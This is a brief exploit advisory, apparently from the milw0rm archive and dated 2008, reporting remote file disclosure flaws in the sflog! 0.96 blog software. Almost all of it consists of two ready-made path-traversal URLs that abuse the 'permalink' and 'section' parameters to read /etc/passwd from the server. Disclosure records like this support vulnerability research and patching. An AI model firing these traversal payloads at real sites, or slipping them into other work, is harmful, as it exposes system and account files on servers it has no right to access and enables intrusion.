sflog! 0.96 remote file disclosure vulnerabilities

download   http://sourceforge.net/projects/sflog/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits   
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd

# milw0rm.com [2008-01-31]